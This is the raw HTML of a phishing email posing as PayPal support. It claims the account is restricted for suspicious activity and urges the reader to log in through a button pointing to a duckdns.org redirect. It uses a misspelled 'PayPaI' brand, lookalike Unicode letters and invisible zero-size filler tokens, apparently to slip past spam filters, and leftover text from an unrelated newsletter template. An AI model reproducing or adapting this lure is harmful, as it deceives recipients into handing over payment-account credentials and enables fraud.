<html lang="en"><head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Paypal Services</title>
    <link href="https://fonts.googleapis.com/css?family=Raleway:100,600" rel="stylesheet" type="text/css">
    <style>
        html, body{background-color: #fff; color: #636b6f; font-family: 'Raleway', sans-serif; font-weight: 100; height: 100vh; margin: 0;}.full-height{height: 100vh;}.flex-center{align-items: center; display: flex; justify-content: center;}.position-ref{position: relative;}.top-right{position: absolute; right: 10px; top: 18px;}.content{text-align: center;}.title{font-size: 84px;}.links > a{color: #636b6f; padding: 0 25px; font-size: 12px; font-weight: 600; letter-spacing: .1rem; text-decoration: none; text-transform: uppercase;}.m-b-md{margin-bottom: 30px;}
    </style>


<meta name="viewport" content="width=device-width, initial-scale=1"><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<title>The Key to Experiencing Your Desired Future NOW: Free 4-Part Workshop with Dr. Joe Dispenza</title>
	<style type="text/css">body {
    width:100%!important;
    -webkit-text-size-adjust:100%;
    -ms-text-size-adjust:100%;
    margin:0;
    padding:0;
	}
  
  .ExternalClass {
    width: 100%;
  }
  
  span{
    font-family: Arial, Helvetica, sans-serif;
  }

	
	@media only screen and (max-width: 600px) {

    table[class="content_wrap"] {
      width: 94%!important;
    }
    
	table[class="full_width"], img[class="full_width"] {
      width: 100%!important;
    }
	
	table[class="table_image"] {
    width: 100%!important;
	padding-bottom:15px!important;
    }

	img[class="table_image"] {
      width: 450px!important;
    }
	
    #templateColumns{
            width:100% !important;
        }
    
	.templateColumnContainer{
            display:block !important;
            width:100% !important;
        }
    
    td[class="text-center"] {
      text-align: center!important;
	  font-size:16px !important;
      line-height:175% !important;
    }
	
	td[class="text-left"] {
      text-align: left!important
    }
	
	.navtext{
		font-size:16px !important;
	}
	
	table[class="hide"], img[class="hide"], td[class="hide"], span[class="hide"], div[class="hide"] {
      display: none !important;
    }
	
	img[class="event_image"] {
      width: 166px !important;
    }

	}
    
	@media only screen and (max-width: 450px) {
    
    img[class="table_image"] {
      width: 100%!important;
    }
    
    img[class="table_image_450"] {
      width: 100%!important;
    }
    
    img[class="hide_450"], td[class="hide_450"] {
      display: none !important;
    }
    
    }
	</style>

<!--[if mso]>
	<style type="text/css">
	body, table, td, a, span {font-family: Arial, Helvetica, sans-serif !important;}
	</style>
<![endif]-->

</head>
   <body>
        <!--*|IF:MC_PREVIEW_TEXT|*-->
        <!--[if !gte mso 9]><!----><span class="mcnPreviewText" style="display:none; font-size:0px; line-height:0px; max-height:0px; max-width:0px; opacity:0; overflow:hidden; visibility:hidden; mso-hide:all;"></span><!--<![endif]-->
        <!--*|END:IF|*-->
        <center>
            <table align="center" border="0" cellpadding="0" cellspacing="0" height="100%" width="100%" id="bodyTable">
                <tbody><tr>
                    <td align="center" valign="top" id="bodyCell">
                        <!-- BEGIN TEMPLATE // -->
                        <!--[if (gte mso 9)|(IE)]>
                        <table align="center" border="0" cellspacing="0" cellpadding="0" width="600" style="width:600px;">
                        <tr>
                        <td align="center" valign="top" width="600" style="width:600px;">
                        <![endif]-->
                        <table border="0" cellpadding="0" cellspacing="0" width="100%" class="templateContainer">
                            <tbody><tr>
                                <td valign="top" id="templatePreheader"><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnTextBlock" style="min-width:100%;">
    <tbody class="mcnTextBlockOuter">
        <tr>
            <td valign="top" class="mcnTextBlockInner" style="padding-top:9px;">
              	<!--[if mso]>
				<table align="left" border="0" cellspacing="0" cellpadding="0" width="100%" style="width:100%;">
				<tr>
				<![endif]-->
			    
				<!--[if mso]>
				<td valign="top" width="600" style="width:600px;">
				<![endif]-->
				<!--[if mso]>
				</td>
				<![endif]-->
                
				<!--[if mso]>
				</tr>
				</table>
				<![endif]-->
            </td>
        </tr>
    </tbody>
</table></td>
                            </tr>
                            <tr>
                                <td valign="top" id="templateHeader"><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnImageBlock" style="min-width:100%;">
    <tbody class="mcnImageBlockOuter">
            <tr>
                <td valign="top" style="padding:0px" class="mcnImageBlockInner">
                    <table align="center" width="100%" border="0" cellpadding="0" cellspacing="0" class="mcnImageContentContainer" style="min-width:100%;">
                        <tbody><tr>
                            <td class="mcnImageContent" valign="top" style="padding-right: 0px; padding-left: 10px; padding-top: 0; padding-bottom: 0;">
                                
                                    
                                        <img align="center" alt="" src="https://mcusercontent.com/b9e0b56280f5d15c6b558c6e8/images/ad6586b1-4993-413f-9099-2e405a5f5938.png" width="150" style="max-width:2209px; padding-bottom: 0; display: inline !important; vertical-align: bottom;" class="mcnImage">
                                    
                                
                            </td>
                        </tr>
                    </tbody></table>
                </td>
            </tr>
    </tbody>
</table></td>
                            </tr>
                            <tr>
                                <td valign="top" id="templateBody"><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnTextBlock" style="min-width:100%;">
    <tbody class="mcnTextBlockOuter">
        <tr>
            <td valign="top" class="mcnTextBlockInner" style="padding-top:9px;">
              	<!--[if mso]>
				<table align="left" border="0" cellspacing="0" cellpadding="0" width="100%" style="width:100%;">
				<tr>
				<![endif]-->
			    
				<!--[if mso]>
				<td valign="top" width="600" style="width:600px;">
				<![endif]-->
                <table align="left" border="0" cellpadding="0" cellspacing="0" style="max-width:100%; min-width:100%;" width="100%" class="mcnTextContentContainer">
                    <tbody><tr>
                        
                        <td valign="top" class="mcnTextContent" style="padding-top:0; padding-right:18px; padding-bottom:9px; padding-left:18px;">
                        
                            <span style="color:blue"><span style="font-family: Arial; font-size:20px">ğ–¸ğ—ˆğ—ğ—‹ ğ–¯ğ–ºğ—’ğ–¯ğ–ºğ–¨ ğ–ºğ–¼ğ–¼ğ—ˆğ—ğ—‡ğ— ğ—ğ–ºğ—Œ ğ–»ğ–¾ğ–¾ğ—‡ ğ—ğ–¾ğ—†ğ—‰ğ—ˆğ—‹ğ–ºğ—‹ğ—‚ğ—…ğ—’ ğ—‹ğ–¾ğ—Œğ—ğ—‹ğ—‚ğ–¼ğ—ğ–¾ğ–½</span></span><br>
<span style="font-family: Arial;">
<br>
ğ–¸ğ—ˆğ—ğ—‹ ğ–¯ğ–ºğ—’ğ–¯ğ–ºğ–¨ ğ–ºğ–¼ğ–¼ğ—ˆğ—ğ—‡ğ— ğ—ğ–ºğ—Œ ğ–»ğ–¾ğ–¾ğ—‡ ğ—…ğ—‚ğ—†ğ—‚ğ—ğ–¾ğ–½.<font style="color:transparent;font-size:0px">##mix_normal_7##</font>
ğ–¶ğ–¾ ğ—ğ–ºğ—ğ–¾ ğ–¿ğ—ˆğ—ğ—‡ğ–½ ğ—Œğ—ğ—Œğ—‰ğ—‚ğ–¼ğ—‚ğ—ˆğ—ğ—Œ ğ–ºğ–¼ğ—ğ—‚ğ—ğ—‚ğ—ğ—’ ğ—ˆğ—‡ ğ—’ğ—ˆğ—ğ—‹ ğ—…ğ–ºğ—Œğ— ğ—ğ—‹ğ–ºğ—‡ğ—Œğ–ºğ–¼ğ—ğ—‚ğ—ˆğ—‡.<br><font style="color:transparent;font-size:0px">##mix_normal_8##</font>
<br><font style="color:transparent;font-size:0px">##mix_normal_9##</font>
ğ– ğ— ğ—ğ—ğ—‚ğ—Œ ğ—ğ—‚ğ—†ğ–¾, ğ—’ğ—ˆğ— ğ—ğ—ˆğ—‡'ğ— ğ–»ğ–¾ ğ–ºğ–»ğ—…ğ–¾ ğ—ğ—ˆ :
                          <ul>
	<li>ğ–²ğ–¾ğ—‡ğ–½ ğ–¯ğ–ºğ—’ğ—†ğ–¾ğ—‡ğ—</li>
	<li>ğ–¶ğ—‚ğ—ğ—ğ–½ğ—‹ğ–ºğ— ğ–¥ğ—ğ—‡ğ–½ğ—Œ</li>
</ul>ğ–«ğ—ˆğ—€ğ—‚ğ—‡ ğ—ğ—ˆ ğ—’ğ—ˆğ—ğ—‹ ğ–¯ğ–ºğ—’ğ–¯ğ–ºğ–¨ ğ–ºğ–¼ğ–¼ğ—ˆğ—ğ—‡ğ— ğ–ºğ—‡ğ–½ ğ—ğ–ºğ—„ğ–¾ ğ—ğ—ğ–¾ ğ—Œğ—ğ–¾ğ—‰ğ—Œ ğ—‹ğ–¾ğ—Šğ—ğ–¾ğ—Œğ—ğ–¾ğ–½.</span><font style="color:transparent;font-size:0px">##mix_normal_6##</font>
                        </td>
                    </tr>
                </tbody></table>
				<!--[if mso]>
				</td>
				<![endif]-->
                
				<!--[if mso]>
				</tr>
				</table>
				<![endif]-->
            </td>
        </tr>
    </tbody>
</table><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnButtonBlock" style="min-width:100%;">
    <tbody class="mcnButtonBlockOuter">
        <tr>
            <td style="padding-top:0; padding-right:18px; padding-bottom:18px; padding-left:18px;" valign="top" align="left" class="mcnButtonBlockInner">
                <table border="0" cellpadding="0" cellspacing="0" class="mcnButtonContentContainer" style="border-collapse: separate !important;border-radius: 50px;background-color: #056FF1;">
                    <tbody>
                        <tr>
                            <td align="center" valign="middle" class="mcnButtonContent" style="font-family: Arial; font-size: 16px; padding: 18px;">
                                <a class="mcnButton " title="Log in to PayPaI" href="https://sedekahyuk.duckdns.org/r/lb9RmTo" target="_blank" style="font-weight: bold;letter-spacing: normal;line-height: 100%;text-align: center;text-decoration: none;color: #FFFFFF;">ğ–«ğ—ˆğ—€ ğ—‚ğ—‡ ğ—ğ—ˆ ğ–¯ğ–ºğ—’ğ–¯ğ–ºğ–¨</a>
                            </td>
                        </tr>
                    </tbody>
                </table>
            </td>
        </tr>
    </tbody>
</table><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnTextBlock" style="min-width:100%;">
    <tbody class="mcnTextBlockOuter">
        <tr>
            <td valign="top" class="mcnTextBlockInner" style="padding-top:9px;">
              	<!--[if mso]>
				<table align="left" border="0" cellspacing="0" cellpadding="0" width="100%" style="width:100%;">
				<tr>
				<![endif]-->
			    
				<!--[if mso]>
				<td valign="top" width="600" style="width:600px;">
				<![endif]-->
                <table align="left" border="0" cellpadding="0" cellspacing="0" style="max-width:100%; min-width:100%;" width="100%" class="mcnTextContentContainer">
                    <tbody><tr>
                        
                        <td valign="top" class="mcnTextContent" style="padding-top:0; padding-right:18px; padding-bottom:9px; padding-left:18px;">
                        
<span style="font-family: Arial;">                           ğ–²ğ—‚ğ—‡ğ–¼ğ–¾ğ—‹ğ–¾ğ—…ğ—’,<br>
  <br>
ğ–¯ğ–ºğ—’ğ–¯ğ–ºğ–¨ ğ–²ğ—ğ—‰ğ—‰ğ—ˆğ—‹ğ—
                        </span></td>
                    </tr>
                </tbody></table>
				<!--[if mso]>
				</td>
				<![endif]-->
                
				<!--[if mso]>
				</tr>
				</table>
				<![endif]-->
            </td>
        </tr>
    </tbody>
</table></td>
                            </tr>
                            <tr>
                                <td valign="top" id="templateFooter"><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnTextBlock" style="min-width:100%;">
    <tbody class="mcnTextBlockOuter">
        <tr>
            <td valign="top" class="mcnTextBlockInner" style="padding-top:9px;">
              	<!--[if mso]>
				<table align="left" border="0" cellspacing="0" cellpadding="0" width="100%" style="width:100%;">
				<tr>
				<![endif]-->
			    
				<!--[if mso]>
				<td valign="top" width="600" style="width:600px;">
				<![endif]-->
                <table align="left" border="0" cellpadding="0" cellspacing="0" style="max-width:100%; min-width:100%;" width="100%" class="mcnTextContentContainer">
                    <tbody><tr>
                        
                        <td valign="top" class="mcnTextContent" style="padding-top:0; padding-right:18px; padding-bottom:9px; padding-left:18px;">
                        
                            
                        </td>
                    </tr>
                </tbody></table>
				<!--[if mso]>
				</td>
				<![endif]-->
                
				<!--[if mso]>
				</tr>
				</table>
				<![endif]-->
            </td>
        </tr>
    </tbody>
</table><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnDividerBlock" style="min-width:100%;">
    <tbody class="mcnDividerBlockOuter">
        <tr>
            <td class="mcnDividerBlockInner" style="min-width: 100%; padding: 10px 18px 25px;">
                <table class="mcnDividerContent" border="0" cellpadding="0" cellspacing="0" width="100%" style="min-width: 100%;border-top: 2px solid #EEEEEE;">
                    <tbody><tr>
                        <td>
                            <span></span>
                        </td>
                    </tr>
                </tbody></table>
<!--            
                <td class="mcnDividerBlockInner" style="padding: 18px;">
                <hr class="mcnDividerContent" style="border-bottom-color:none; border-left-color:none; border-right-color:none; border-bottom-width:0; border-left-width:0; border-right-width:0; margin-top:0; margin-right:0; margin-bottom:0; margin-left:0;" />
-->
            </td>
        </tr>
    </tbody>
</table><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnTextBlock" style="min-width:100%;">
    <tbody class="mcnTextBlockOuter">
        <tr>
            <td valign="top" class="mcnTextBlockInner" style="padding-top:9px;">
              	<!--[if mso]>
				<table align="left" border="0" cellspacing="0" cellpadding="0" width="100%" style="width:100%;">
				<tr>
				<![endif]-->
			    
				<!--[if mso]>
				<td valign="top" width="600" style="width:600px;">
				<![endif]-->
				<!--[if mso]>
				</td>
				<![endif]-->
                
				<!--[if mso]>
				</tr>
				</table>
				<![endif]-->
            </td>
        </tr>
    </tbody>
</table></td>
                            </tr>
                        </tbody></table>
                        <!--[if (gte mso 9)|(IE)]>
                        </td>
                        </tr>
                        </table>
                        <![endif]-->
                        <!-- // END TEMPLATE -->
                    </td>
                </tr>
            </tbody></table>
        </center>
    
</body></html>